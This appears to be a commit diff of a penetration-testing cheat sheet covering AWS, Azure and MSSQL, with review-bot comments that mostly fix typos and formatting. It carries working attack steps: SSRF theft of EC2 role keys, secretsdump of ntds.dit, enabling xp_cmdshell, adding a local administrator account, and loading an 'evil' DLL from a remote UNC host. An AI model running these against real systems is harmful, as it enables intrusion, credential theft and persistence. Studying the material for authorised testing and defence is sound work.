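Review bot: `fn_dp1my_permissions` in the 'Effective Permissions from the Database' block is a typo for `fn_my_permissions` (spelled correctly in the server-level query just above); as written the query fails with an invalid object name. The 'MSSQL Accounts and Hashes' block is fenced as `sql` but interleaves version labels and an explanatory sentence ('Need to convert to hex ...') with the statements, so it cannot be pasted as-is; move the explanation into `--` comments or outside the fence. The hashcat mode list below it is reference data rather than PowerShell, so `ps1` is the wrong fence tag there.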
@ -73,6 +73,31 @@ aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west
14. locally run `"secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets'`, expects secretsdump to be on path


## Access Snapshots

1. Get the `owner-id`
```powershell
$ aws --profile flaws sts get-caller-identity
"Account": "XXXX26262029",
```
2. List snapshots
```powershell
$ aws --profile flaws ec2 describe-snapshots --owner-id XXXX26262029 --region us-west-2
"SnapshotId": "snap-XXXX342abd1bdcb89",
```
3. Create a volume using the previously obtained `snapshotId`
```powershell
$ aws --profile swk ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-XXXX342abd1bdcb89
```
4. In AWS console, deploy a new EC2 Ubuntu based, attach the volume and then mount it on the machine.
```ps1
$ ssh -i YOUR_KEY.pem ubuntu@ec2-XXX-XXX-XXX-XXX.us-east-2.compute.amazonaws.com
$ lsblk
$ sudo file -s /dev/xvda1
$ sudo mount /dev/xvda1 /mnt
```


## Instance Connect

Push an SSH key to EC2 instance
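Review bot: step 3 creates the volume in `us-west-2a`, but the step 4 SSH target is an instance in `us-east-2`; an EBS volume can only be attached to an instance in the same availability zone, so step 4 should state that the instance has to be launched in `us-west-2a`. Minor consistency points in the same steps: step 3 switches to `--profile swk` while steps 1 and 2 use `--profile flaws`, the quoting in step 14 (`"secretsdump.py ... secrets'`) opens with a double quote and closes with a single one, and the `powershell`/`ps1` fences wrap commands that are typed into a POSIX shell (`ssh`, `lsblk`, `sudo mount`), so `bash` is the accurate tag.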
@ -15,9 +15,9 @@ curl -H "X-aws-ec2-metadata-token:$TOKEN" -v "http://169.254.169.254/latest/meta

## Method for Elastic Cloud Compute (EC2)

Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/Awesome-WAF-Role/
Amazon provides an internal service that allows every EC2 instance to query and retrieve metadata about the host. If you discover an SSRF vulnerability running on an EC2 instance, try to fetch the content from 169.254.169.254.

1. Access the IAM : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/
1. Access the IAM : [http://169.254.169.254/latest/meta-data/](http://169.254.169.254/latest/meta-data/)
```powershell
ami-id
ami-launch-index
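Review bot: the step label 'Access the IAM' for `/latest/meta-data/` is inaccurate in both the old and the new line: that path lists the metadata categories (`ami-id`, `ami-launch-index`, ...), while IAM data lives under `/latest/meta-data/iam/` as the later steps show; 'List metadata categories' would be the right label. The hunk header shows the IMDSv2 `X-aws-ec2-metadata-token` header, so the intro sentence should say that on an instance enforcing IMDSv2 (`HttpTokens=required`) these plain GET requests are refused without a session token obtained through a PUT, which is why enforcing IMDSv2 is the standard mitigation for this SSRF path. The listing that follows is metadata output, not PowerShell, so the `powershell` fence tag is misleading.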
@ -30,8 +30,8 @@ Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/me
instance-action
instance-id
```
2. Find the name of the role assigned to the instance : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/
3. Extract the role's temporary keys : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/Awesome-WAF-Role/
2. Find the name of the role assigned to the instance : [http://169.254.169.254/latest/meta-data/iam/security-credentials/](http://169.254.169.254/latest/meta-data/iam/security-credentials/)
3. Extract the role's temporary keys : [http://169.254.169.254/latest/meta-data/iam/security-credentials/<IAM_USER_ROLE_HERE>/](http://169.254.169.254/latest/meta-data/iam/security-credentials/<IAM_USER_ROLE_HERE>/)
```powershell
{
"Code" : "Success",
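Review bot: the new step 3 puts the raw placeholder `<IAM_USER_ROLE_HERE>` inside a markdown link target and link text; renderers treat `<IAM_USER_ROLE_HERE>` as an HTML tag, so the link renders broken. Keep placeholder URLs in backticks rather than as links (the old lines avoided the problem by using plain URLs). The credential response that follows is JSON, so `json` is the right fence tag instead of `powershell`.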
@ -69,7 +69,7 @@ Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/me

## AWS API calls that return credentials

- chime:createapikey
- [chime:createapikey](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonchime.html)
- [codepipeline:pollforjobs](https://docs.aws.amazon.com/codepipeline/latest/APIReference/API_PollForJobs.html)
- [cognito-identity:getopenidtoken](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetOpenIdToken.html)
- [cognito-identity:getopenidtokenfordeveloperidentity](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetOpenIdTokenForDeveloperIdentity.html)
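Review bot: the new `chime:createapikey` link points at the generic service-authorization action list for Chime, while the other three entries link to the specific API operation page; either link the operation's own reference or say in the entry that the action is documented only in the authorization reference. Since this list is exactly the set of event names a defender wants CloudTrail alerts on, one sentence saying so would make the section useful on both sides.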
@ -1,7 +1,13 @@
# AWS - Service - S3 Buckets

An AWS S3 bucket is a cloud-based storage container that holds files, known as objects, which can be accessed over the internet. It is highly scalable and can store large amounts of data, such as documents, images, and backups. S3 provides robust security through access control, encryption, and permissions management. It ensures high durability and availability, making it ideal for storing and retrieving data from anywhere.

## Tools

* [aws/aws-cli](https://github.com/aws/aws-cli) - Universal Command Line Interface for Amazon Web Services
```ps1
sudo apt install awscli
```
* [digi.ninja/bucket-finder](https://digi.ninja/projects/bucket_finder.php) - Search for public buckets, list and download all files if directory indexing is enabled
```powershell
wget https://digi.ninja/files/bucket_finder_1.1.tar.bz2 -O bucket_finder_1.1.tar.bz2
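Review bot: the new intro paragraph is product copy ("robust security", "ideal for storing and retrieving data from anywhere") and states nothing the rest of the page builds on; one sentence on what the page actually covers (finding buckets, checking whether they are publicly listable or writable) would be more useful. `sudo apt install awscli` is fenced as `ps1` and the `wget` line below as `powershell`; both are POSIX shell commands, so tag them `bash` consistently.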
@ -10,7 +16,6 @@
./bucket_finder.rb --download --region ie my_words
./bucket_finder.rb --log-file bucket.out my_words
```

* [aws-sdk/boto3](https://boto3.amazonaws.com/v1/documentation/api/latest/index.html) - Amazon Web Services (AWS) SDK for Python
```python
import boto3
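Review bot: this hunk only removes a blank line before the boto3 entry; fine as a cleanup, but markdown renders list items separated by blank lines as a loose list and adjacent ones as a tight list, so the spacing should be made consistent across every entry of the Tools list rather than for this one item.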
@ -22,7 +27,6 @@
except Exception as e:
print(e)
```

* [nccgroup/s3_objects_check](https://github.com/nccgroup/s3_objects_check) - Whitebox evaluation of effective S3 object permissions, to identify publicly accessible files
```powershell
$ python3 -m venv env && source env/bin/activate
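Review bot: `python3 -m venv env && source env/bin/activate` is fenced as `powershell`, but `source` and `&&` are POSIX shell syntax; tag it `bash`. In the boto3 context lines, the bare `except Exception as e: print(e)` hides the one distinction a bucket check exists to surface, AccessDenied versus NoSuchBucket; catching `botocore.exceptions.ClientError` and reading `e.response['Error']['Code']` would make the printed result meaningful.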
@ -30,14 +34,107 @@
$ python s3-objects-check.py -h
$ python s3-objects-check.py -p whitebox-profile -e blackbox-profile
```

* [grayhatwarfare/buckets](https://buckets.grayhatwarfare.com/) - Search Public Buckets


##
## Credentials and Profiles

Create a profile with your `AWSAccessKeyId` and `AWSSecretKey`, then you can use `--profile nameofprofile` in the `aws` command.

```js
aws configure --profile nameofprofile
AWS Access Key ID [None]: <AWSAccessKeyId>
AWS Secret Access Key [None]: <AWSSecretKey>
Default region name [None]:
Default output format [None]:
```

Alternatively you can use environment variables instead of creating a profile.

```bash
export AWS_ACCESS_KEY_ID=ASIAZ[...]PODP56
export AWS_SECRET_ACCESS_KEY=fPk/Gya[...]4/j5bSuhDQ
export AWS_SESSION_TOKEN=FQoGZXIvYXdzE[...]8aOK4QU=
```


## Open S3 Bucket

An open S3 bucket refers to an Amazon Simple Storage Service (Amazon S3) bucket that has been configured to allow public access, either intentionally or by mistake. This means that anyone on the internet could potentially access, read, or even modify the data stored in the bucket, depending on the permissions set.

* [http://s3.amazonaws.com/<bucket-name>/](http://s3.amazonaws.com/<bucket-name>/)
* [http://<bucket-name>.s3.amazonaws.com/](http://<bucket-name>.s3.amazonaws.com/)

AWS S3 buckets name examples: [http://flaws.cloud.s3.amazonaws.com](http://flaws.cloud.s3.amazonaws.com).

Either bruteforce the buckets name with keyword related to your target or search through the leaked one using OSINT tool such as [buckets.grayhatwarfare.com](https://buckets.grayhatwarfare.com/).

When file listing is enabled, the name is also displayed inside the `<Name>` XML tag.

```xml
<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Name>adobe-REDACTED-REDACTED-REDACTED</Name>
```


## Bucket Interations

### Find the Region

To find the region of an Amazon Web Services (AWS) service (such as an S3 bucket) using dig or nslookup, query the DNS records for the service's domain or endpoint.

```bash
$ dig flaws.cloud
;; ANSWER SECTION:
flaws.cloud. 5 IN A 52.218.192.11

$ nslookup 52.218.192.11
Non-authoritative answer:
11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com.
```


### List Files

To list files in an AWS S3 bucket using the AWS CLI, you can use the following command:

```bash
aws s3 ls <target> [--options]
aws s3 ls s3://bucket-name --no-sign-request --region <insert-region-here>
aws s3 ls s3://flaws.cloud/ --no-sign-request --region us-west-2
```


### Copy, Upload and Download Files

* Copy
```bash
aws s3 cp <source> <target> [--options]
aws s3 cp local.txt s3://bucket-name/remote.txt --acl authenticated-read
aws s3 cp login.html s3://bucket-name --grants read=uri=http://acs.amazonaws.com/groups/global/AllUsers
```

* Upload
```bash
aws s3 mv <source> <target> [--options]
aws s3 mv test.txt s3://hackerone.files
SUCCESS : "move: ./test.txt to s3://hackerone.files/test.txt"
```

* Download
```bash
aws s3 sync <source> <target> [--options]
aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ . --no-sign-request --region us-west-2
```


## References

* []()
* [There's a Hole in 1,951 Amazon S3 Buckets - Mar 27, 2013 - Rapid7 willis](https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets)
* [Bug Bounty Survey - AWS Basic test](https://web.archive.org/web/20180808181450/https://twitter.com/bugbsurveys/status/860102244171227136)
* [flaws.cloud Challenge based on AWS vulnerabilities - Scott Piper - Summit Route](http://flaws.cloud/)
* [flaws2.cloud Challenge based on AWS vulnerabilities - Scott Piper - Summit Route](http://flaws2.cloud)
* [Guardzilla video camera hardcoded AWS credential - INIT_6 - December 27, 2018](https://blackmarble.sh/guardzilla-video-camera-hard-coded-aws-credentials/)
* [AWS PENETRATION TESTING PART 1. S3 BUCKETS - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-1-s3-buckets/)
* [AWS PENETRATION TESTING PART 2. S3, IAM, EC2 - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-2-s3-iam-ec2/)
* [A Technical Analysis of the Capital One Hack - CloudSploit - Aug 2 2019](https://blog.cloudsploit.com/a-technical-analysis-of-the-capital-one-hack-a9b43d7c8aea?gi=8bb65b77c2cf)
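Review bot: `## Bucket Interations` is a typo for `Interactions`, the bare `##` heading before `## Credentials and Profiles` and the empty `* []()` reference entry should not ship, and the two `<bucket-name>` URLs are written as markdown links whose targets contain an angle-bracket placeholder, which renders as a broken link (put them in backticks). The `aws configure` transcript is fenced as `js`; it is a shell session, so `bash` or a plain fence fits. Under 'Upload', `aws s3 mv` is a move, not an upload: the local `test.txt` is deleted once the transfer succeeds, so either use `cp` there or state the side effect. The `--grants read=uri=.../AllUsers` example in the 'Copy' block creates exactly the world-readable object the 'Open S3 Bucket' section warns about; a short note saying so keeps the two sections consistent.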
@ -0,0 +1,103 @@
# aka.ms Shortcuts

aka.ms is a URL shortening service used by Microsoft. It is commonly employed to create short, easily shareable links that redirect users to longer or more complex URLs, typically related to Microsoft services, products, or resources.

## Azure Active Directory - Admins

|aka.ms|Command|Portal Blade|
|-----|----|---|
|[aka.ms/ad/ca](https://aka.ms/ad/ca)|ca|Conditional Access|
|[aka.ms/ad/cawhatif](https://aka.ms/ad/cawhatif)|cawhatif|Conditional Access What If|
|[aka.ms/ad/pim](https://aka.ms/ad/pim)|pim|Privileged Identity Management|
|[aka.ms/ad/users](https://aka.ms/ad/users)|users|Users|
|[aka.ms/ad/groups](https://aka.ms/ad/groups)|groups|Groups|
|[aka.ms/ad/devices](https://aka.ms/ad/devices)|devices|Devices|
|[aka.ms/ad/apps](https://aka.ms/ad/apps)|apps|Enterprise Applications|
|[aka.ms/ad/appreg](https://aka.ms/ad/appreg)|appreg|Application Registrations|
|[aka.ms/ad/auth](https://aka.ms/ad/auth)|auth|Authentication Methods Policies|
|[aka.ms/ad/legacymfa](https://aka.ms/ad/legacymfa)|legacymfa|Legacy MFA|
|[aka.ms/ad/guests](https://aka.ms/ad/guests)|guests|Guest Access Settings|
|[aka.ms/ad/logs](https://aka.ms/ad/logs)|logs|Sign in Logs|
|[aka.ms/ad/xtap](https://aka.ms/ad/xtap)|xtap|Cross Tenant Access Settings|
|[aka.ms/ad/roles](https://aka.ms/ad/roles)|roles|Azure AD Roles|
|[aka.ms/ad/sspr](https://aka.ms/ad/sspr)|sspr|Password Reset|
|[aka.ms/ad/security](https://aka.ms/ad/security)|security|Security|
|[aka.ms/ad/mfaunblock](https://aka.ms/ad/mfaunblock)|mfaunblock|MFA Unblock|
|[aka.ms/ad/reviews](https://aka.ms/ad/reviews)|reviews|Access Reviews|
|[aka.ms/ad/score](https://aka.ms/ad/score)|score|Secure Score|
|[aka.ms/ad/license](https://aka.ms/ad/license)|license|Licenses|
|[aka.ms/ad/synclog](https://aka.ms/ad/synclog)|synclog|AAD Connect Sync Errors|
|[aka.ms/ad/adfslog](https://aka.ms/ad/adfslog)|adfslog|ADFS Log|
|[aka.ms/ad/consent](https://aka.ms/ad/consent)|consent|Consents and Permissions|
|[aka.ms/ad/support](https://aka.ms/ad/support)|support|Support|
|[aka.ms/ad/list](https://aka.ms/ad/list)|list|List all these shortcuts|

## Microsoft Admin Portals

|aka.ms|Command|Page|
|-----|----|---|
|[aka.ms/admin](https://aka.ms/admin)|admin|[M365 Admin Portal](https://admin.microsoft.com)|
|[aka.ms/azad](https://aka.ms/azad)|azad|[Azure AD Portal](https://portal.azure.com)|
|[aka.ms/ge](https://aka.ms/ge)|ge|[Graph Explorer](https://developer.microsoft.com/graph/graph-explorer)|
|[aka.ms/intune](https://aka.ms/intune)|intune|[Intune](https://endpoint.microsoft.com)|
|[aka.ms/ppac](https://aka.ms/ppac)|ppac|[Power Platform](https://admin.powerplatform.microsoft.com/)|

## Microsoft Intune Portals

|aka.ms|Command|Page|
|-----|----|---|
|[aka.ms/in](https://aka.ms/in)|in|Intune admin center|
|[aka.ms/intuneshd](https://aka.ms/intuneshd)|intuneshd|Intune service health|
|[aka.ms/intunesupport](https://aka.ms/intunesupport)|support|Get Intune Support|
|[aka.ms/enrollmymac](https://aka.ms/enrollmymac)|enrollmymac|Download the Intune Company Portal for Macs|

## Microsoft 365 Defender

|aka.ms|Command|Portal Blade|
|-----|----|---|
|[aka.ms/de](https://aka.ms/de)|de|Microsoft 365 Defender|
|[aka.ms/de/incidents](https://aka.ms/de/incidents)|incidents|Incidents|
|[aka.ms/de/hunting](https://aka.ms/de/hunting)|hunting|Hunting|
|[aka.ms/de/actions](https://aka.ms/de/actions)|actions|Action Center|
|[aka.ms/de/explorer](https://aka.ms/de/explorer)|explorer|Explorer|

## Microsoft User Portals

|aka.ms|Page|
|-----|---|
|[aka.ms/sspr](https://aka.ms/sspr)|Self Service Password Reset|
|[aka.ms/mysecurity](https://aka.ms/mysecurity)|My Security|
|[aka.ms/myapps](https://aka.ms/myapps)|My Apps|
|[aka.ms/my-account](https://aka.ms/my-account)|My Account|
|[aka.ms/my-groups](https://aka.ms/my-groups)|My Groups|
|[aka.ms/my-access](https://aka.ms/my-access)|My Access Packages|
|[aka.ms/mystaff](https://aka.ms/mystaff)|My Access Packages|
|[aka.ms/mfasetup](https://aka.ms/mfasetup)|Alternative for My Security|

## Identity Protection

|aka.ms|Page|
|-----|---|
|[aka.ms/identityprotection](https://aka.ms/identityprotection)|Identity Protection|

## Winget (Windows Package Manager)

|aka.ms|Page|
|-----|---|
|[aka.ms/getwinget](https://aka.ms/getwinget)|Get Winget Installer|
|[aka.ms/winget-docs](https://aka.ms/winget-docs)|Winget Documentation|
|[aka.ms/winget](https://aka.ms/winget)|Winget Packages (Github Repo)|

## Miscellaneous

|aka.ms|Page|
|-----|---|
|[aka.ms/entradeprecations](https://aka.ms/entradeprecations)|Entra/Azure AD related retirements/deprecations|
|[aka.ms/entratemplates](https://aka.ms/entratemplates)|Email templates & posters to roll out Azure Active Directory features|
|[aka.ms/Fileshare Migration](https://aka.ms/odsp-mm-fs)|Fileshare Migration Portal|


## References

* [microsoft/aka - GitHub - microsoftopensource](https://github.com/microsoft/aka)
* [levid0s/AzurePortals - levid0s - 2019](https://github.com/levid0s/AzurePortals)
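Review bot: the `aka.ms/mystaff` row repeats the description of the row above it (`My Access Packages`), which looks like a copy-paste slip; `aka.ms/mystaff` is the My Staff portal. Two smaller table issues: the `intunesupport` row's Command column reads `support`, which collides with the `support` command of `aka.ms/ad/support` in the first table, and the `aka.ms/Fileshare Migration` entry's link text does not match its target `aka.ms/odsp-mm-fs` (every other row uses the real short link as the text). `Sign in Logs` should be `Sign-in Logs` to match the portal blade name.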
@ -1,4 +1,4 @@
# Azure AD - Tokens
# Azure AD - Access and Tokens

## Connection

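Review bot: renaming the H1 from `Azure AD - Tokens` to `Azure AD - Access and Tokens` changes the title that the repository index and cross-page links use as their text; check that the README entry and any in-repo links to this page are updated in the same commit so the title and link text do not drift apart.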
@ -322,7 +322,7 @@ MimiKatz (version 2.2.0 and above) can be used to attack (hybrid) Azure AD joine
* Request a nonce from AAD: `roadrecon auth --prt-init -t <tenant-id>`
* Use [dirkjanm/ROADtoken](https://github.com/dirkjanm/ROADtoken) or [wotwot563/aad_prt_bof](https://github.com/wotwot563/aad_prt_bof) to initiate a new PRT request.
* `roadrecon auth --prt-cookie <prt-cookie> --tokens-stdout --debug` or `roadtx gettoken --prt-cookie <x-ms-refreshtokencredential>`
* Then browse to [login.microsoftonline.com](login.microsoftonline.com) with a cookie `x-ms-RefreshTokenCredential:<output-from-roadrecon>`
* Then browse to [login.microsoftonline.com](https://login.microsoftonline.com) with a cookie `x-ms-RefreshTokenCredential:<output-from-roadrecon>`
```powershell
Name: x-ms-RefreshTokenCredential
Value: <Signed JWT>
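Review bot: the link fix is correct, since a bare host (`login.microsoftonline.com`) as a markdown link target renders as a relative path on the hosting site rather than an external link. The `Name:`/`Value:` cookie pair that follows is not PowerShell, so the `powershell` fence only produces misleading highlighting; a plain fence or `text` is better.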
@ -1,4 +1,4 @@
# Azure AD - Azure AD Connect
# Azure AD - AD Connect and Cloud Sync

| Active Directory | Azure AD |
|-----------------------------------|-------------------|
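Review bot: the new title adds 'Cloud Sync', but this hunk changes only the heading; if the body has no section on Cloud Sync (the provisioning-agent-based sync, which is a separate product from the Azure AD Connect server the comparison table below describes), the title promises content the page does not have. Same check as for the Tokens page rename: update the README entry and in-repo link text in the same commit.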
@ -30,7 +30,6 @@ Subscriptions:
* **Core Domain**: The initial domain name <tenant>.onmicrosoft.com is the core domain. It is possible to define custom domain names too.



## References

* [Az - Permissions for a Pentest - HackTricks](https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-permissions-for-a-pentest)
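Review bot: `<tenant>.onmicrosoft.com` in the Core Domain bullet is not in backticks, so markdown renderers treat `<tenant>` as an HTML tag and the rendered text reads `.onmicrosoft.com`; write it as a code span. The blank-line removal itself is fine.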
@ -6,6 +6,7 @@
az webapp list
```


## Execute Commands

```ps1
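Review bot: whitespace-only change (a second blank line before `## Execute Commands`), consistent with the two-blank-line section spacing used elsewhere in this commit; nothing else to flag, except that the `ps1` fence opening right after would be better tagged `powershell` to match the Azure tokens page in the same commit.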
@ -19,6 +20,7 @@ Invoke-AzureRMWebAppShellCommand `
-Command "whoami"
```


## SSH Connection

First check if the SSH over HTTP connection is enabled: `(curl https://${appName}?app.scm.azurewebsites.net/webssh/host).statuscode`
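Review bot: the check URL in the context line, `https://${appName}?app.scm.azurewebsites.net/webssh/host`, has a `?` where a `.` belongs; the Kudu host is `<app-name>.scm.azurewebsites.net`, as the Kudu section added further down in this same file states, so as written the request goes to a host named `${appName}` with the rest as a query string. Worth fixing while the section is being touched.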
@ -29,6 +31,25 @@ az webapp create-remote-connection --subscription <SUBSCRIPTION-ID> --resource-g
```


## Kudu

In Azure App Service, Kudu is the advanced management and deployment tool used for various operations such as continuous integration, troubleshooting, and diagnostic tasks for your web applications. It provides a set of utilities and features for managing your app’s environment, including access to application settings, log streams, and deployment management.

You can access this Kudu app at the following URLs:

* App not in the Isolated tier: `https://<app-name>.scm.azurewebsites.net`
* Internet-facing app in the Isolated tier (App Service Environment): `https://<app-name>.scm.<ase-name>.p.azurewebsites.net`
* Internal app in the Isolated tier (App Service Environment for internal load balancing): `https://<app-name>.scm.<ase-name>.appserviceenvironment.net`

Key Features of Kudu in App Service:

* **Web-Based Console**: Provides a command-line interface (CLI) to execute commands directly on the App Service environment.
* **File Explorer**: Lets you view and manage files in your app’s environment.
* **Environment Diagnostics**: Offers insights into the environment variables, app settings, and detailed diagnostic logs.
* **Process Explorer**: Allows you to monitor and manage running processes in your app’s environment.
* **Access to Logs**: Easily view, download, and stream logs for debugging and troubleshooting.


## References

* [Training - Attacking and Defending Azure Lab - Altered Security](https://www.alteredsecurity.com/azureadlab)
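Review bot: the new Kudu section describes the tool but not what decides whether its console is reachable: the SCM site authenticates with the app's publishing (deployment) credentials or the caller's Azure RBAC role on the app, and basic-auth publishing credentials for the SCM endpoint can be disabled per app. One sentence on that tells the reader what gates the web console and tells a defender which setting to turn off; without it the feature list reads as product documentation rather than as part of an assessment page.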
@ -0,0 +1,40 @@
# Azure Services - DNS Suffix

## DNS table

Many Azure services generate custom endpoints with a suffix such as `.cloudapp.azure.com`, `.windows.net`. Below is a table of common services and their associated DNS suffixes.

These services can also be leveraged for domain fronting or communication with an external C2 server when they are whitelisted by the proxy or the firewall rules.

| Service | Domain |
| --- | --- |
| Analysis Services Suffix | .asazure.windows.net |
| API Management Suffix | .azure-api.net |
| App Services Suffix | .azurewebsites.net |
| Automation Suffix | .azure-automation.net |
| Batch Suffix | .batch.azure.com |
| Blob Endpoint Suffix | .blob.core.windows.net |
| CDN Suffix | .azureedge.net |
| Data Lake Analytics Catalog Suffix | .azuredatalakeanalytics.net |
| Data Lake Store Suffix | .azuredatalakestore.net |
| DocumentDB/CosmosDB Suffix | .documents.azure.com |
| Event Hubs Suffix | .servicesbus.windows.net |
| File Endpoint Suffix | .file.core.windows.net |
| FrontDoor Suffix | .azurefd.net |
| IoT Hub Suffix | .azure-devices.net |
| Key Vault Suffix | .vault.azure.net |
| Logic App Suffix | .azurewebsites.net |
| Queue Endpoint Suffix | .queue.core.windows.net |
| Redis Cache Suffix | .redis.cache.windows.net |
| Service Bus Suffix | .servicesbus.windows.net |
| Service Fabric Suffix | .cloudapp.azure.com |
| SQL Database Suffix | .database.windows.net |
| Storage Endpoint Suffix | .core.windows.net |
| Table Endpoint Suffix | .table.core.windows.net |
| Traffic Manager Suffix | .trafficmanager.net |
| Web Application Gateway Suffix | .cloudapp.azure.com |


## References

* [Azure services URLs and IP addresses for firewall or proxy whitelisting - Daniel Neumann - 20. December 2016](https://www.danielstechblog.io/azure-services-urls-and-ip-addresses-for-firewall-or-proxy-whitelisting/)
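Review bot: the `Event Hubs Suffix` and `Service Bus Suffix` rows give `.servicesbus.windows.net`; the suffix is `.servicebus.windows.net` (singular), so both rows fail to match the endpoints they are meant to describe. The table would also benefit from a footnote on shared suffixes (`.cloudapp.azure.com` and `.azurewebsites.net` each appear twice, and `.core.windows.net` covers the blob, file, queue and table rows), since a proxy allow-list keyed on one of those entries admits every service behind it, which is the point the second paragraph is making.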
@ -0,0 +1,77 @@
# MSSQL - Audit Checks

## Summary

* [Find and exploit impersonation opportunities ](#find-and-exploit-impersonation-opportunities)
* [Find SQL Server Logins Which can be Impersonated for the Current Database](#find-sql-server-logins-which-can-be-impersonated-for-the-current-database)
* [Find databases that have been configured as trustworthy](#find-databases-that-have-been-configured-as-trustworthy)


## Find and exploit impersonation opportunities

* Impersonate as: `EXECUTE AS LOGIN = 'sa'`
* Impersonate `dbo` with DB_OWNER
```sql
SQL> select is_member('db_owner');
SQL> execute as user = 'dbo'
SQL> SELECT is_srvrolemember('sysadmin')
```

```ps1
Invoke-SQLAuditPrivImpersonateLogin -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Exploit -Verbose

# impersonate sa account
powerpick Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "EXECUTE AS LOGIN = 'sa'; SELECT IS_SRVROLEMEMBER(''sysadmin'')" -Verbose -Debug
```

### Exploiting Impersonation

```sql
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
EXECUTE AS LOGIN = 'adminuser'
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
SELECT ORIGINAL_LOGIN()
```

### Exploiting Nested Impersonation

```sql
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
EXECUTE AS LOGIN = 'stduser'
SELECT SYSTEM_USER
EXECUTE AS LOGIN = 'sa'
SELECT IS_SRVROLEMEMBER('sysadmin')
SELECT ORIGINAL_LOGIN()
SELECT SYSTEM_USER
```


## Find SQL Server Logins Which can be Impersonated for the Current Database

```sql
select distinct b.name
from sys.server_permissions a
inner join sys.server_principals b
on a.grantor_principal_id = b.principal_id
where a.permission_name = 'impersonate'
```


## Find databases that have been configured as trustworthy

```sql
Invoke-SQLAuditPrivTrustworthy -Instance "<DBSERVERNAME\DBInstance>" -Exploit -Verbose

SELECT name as database_name, SUSER_NAME(owner_sid) AS database_owner, is_trustworthy_on AS TRUSTWORTHY from sys.databases
```

> The following audit checks run web requests to load Inveigh via reflection. Be mindful of the environment and ability to connect outbound.

```ps1
Invoke-SQLAuditPrivXpDirtree
Invoke-SQLUncPathInjection
Invoke-SQLAuditPrivXpFileexist
```
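Review bot: in the `powerpick Get-SQLQuery` line the inner quotes are doubled (`''sysadmin''`) inside a double-quoted PowerShell string, where no escaping is needed, so T-SQL receives two empty-string literals around the bare word `sysadmin` and the query errors; it should read `IS_SRVROLEMEMBER('sysadmin')` as in the SQL blocks below. The 'Find databases that have been configured as trustworthy' block mixes a PowerShell cmdlet (`Invoke-SQLAuditPrivTrustworthy`) into an `sql` fence; split it into a `ps1` block the way the impersonation section does. The summary entry `[Find and exploit impersonation opportunities ]` carries a trailing space inside the brackets.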
@ -0,0 +1,315 @@
# MSSQL - Command Execution

## Summary

- [Command Execution via xp_cmdshell](#command-execution-via-xp_cmdshell)
- [Extended Stored Procedure](#extended-stored-procedure)
- [Add the extended stored procedure and list extended stored procedures](#add-the-extended-stored-procedure-and-list-extended-stored-procedures)
- [CLR Assemblies](#clr-assemblies)
- [Execute commands using CLR assembly](#execute-commands-using-clr-assembly)
- [Manually creating a CLR DLL and importing it](#manually-creating-a-clr-dll-and-importing-it)
- [OLE Automation](#ole-automation)
- [Execute commands using OLE automation procedures](#execute-commands-using-ole-automation-procedures)
- [Agent Jobs](#agent-jobs)
- [Execute commands through SQL Agent Job service](#execute-commands-through-sql-agent-job-service)
- [List All Jobs](#list-all-jobs)
- [External Scripts](#external-scripts)
- [Python](#python)
- [R](#r)


## Command Execution via xp_cmdshell

> xp_cmdshell disabled by default since SQL Server 2005

```ps1
PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command whoami

# Creates and adds local user backup to the local administrators group:
PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "net user backup Password1234 /add'" -Verbose
PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "net localgroup administrators backup /add" -Verbose
```

* Manually execute the SQL query
```sql
EXEC xp_cmdshell "net user";
EXEC master..xp_cmdshell 'whoami'
EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:';
EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1';
```
* If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005)
```sql
EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;
```
* If the procedure was uninstalled
```sql
sp_addextendedproc 'xp_cmdshell','xplog70.dll'
```


## Extended Stored Procedure

### Add the extended stored procedure and list extended stored procedures

```ps1
# Create evil DLL
Create-SQLFileXpDll -OutFile C:\temp\test.dll -Command "echo test > c:\temp\test.txt" -ExportName xp_test

# Load the DLL and call xp_test
Get-SQLQuery -UserName sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Query "sp_addextendedproc 'xp_test', '\\10.10.0.1\temp\test.dll'"
Get-SQLQuery -UserName sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Query "EXEC xp_test"

# Listing existing
Get-SQLStoredProcedureXP -Instance "<DBSERVERNAME\DBInstance>" -Verbose
```

* Build a DLL using [xp_evil_template.cpp](https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/xp_evil_template.cpp)
* Load the DLL
```sql
-- can also be loaded from UNC path or Webdav
